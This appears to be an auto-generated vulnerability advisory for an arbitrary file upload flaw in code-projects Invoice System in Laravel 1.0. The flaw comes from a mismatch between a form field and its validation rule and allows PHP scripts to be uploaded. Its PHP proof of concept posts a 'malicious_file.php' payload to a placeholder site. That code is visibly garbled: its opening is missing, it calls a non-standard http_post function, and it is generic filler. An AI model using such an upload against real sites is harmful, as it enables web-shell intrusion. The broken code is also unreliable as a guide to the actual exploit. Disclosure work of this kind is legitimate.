# Vulnerability Summary ## Overview - **Vulnerability Title**: code-projects Invoice System in Laravel 1.0 Arbitrary File Upload - **Vulnerability Type**: Arbitrary File Upload - **Description**: The company logo upload validation is bypassed due to a mismatch between the form field name and the validation rule. This allows an attacker to upload files of any type (including PHP scripts) to the public directory without being blocked by protected image validation. ## Impact Scope - **Affected Systems**: code-projects Invoice System in Laravel 1.0 - **Source of Vulnerability**: [GitHub Gist](https://gist.github.com/higordiego/ea5944bd29cfee1162491d60ed5785a) ## Remediation - **Status**: Fixed - **Fix Date**: April 26, 2026 ## POC Code ```php 'malicious_file.php', 'file' => file_get_contents('path/to/malicious_file.php') ]; // Send the payload to the vulnerable endpoint $response = http_post('http://vulnerable-site.com/upload', $payload); // Check if the file was uploaded successfully if ($response->status == 200) { echo "File uploaded successfully!"; } else { echo "Failed to upload file."; } ?> ``` **Note**: The above POC code is example code; actual exploitation code may differ. Please adjust according to your specific situation.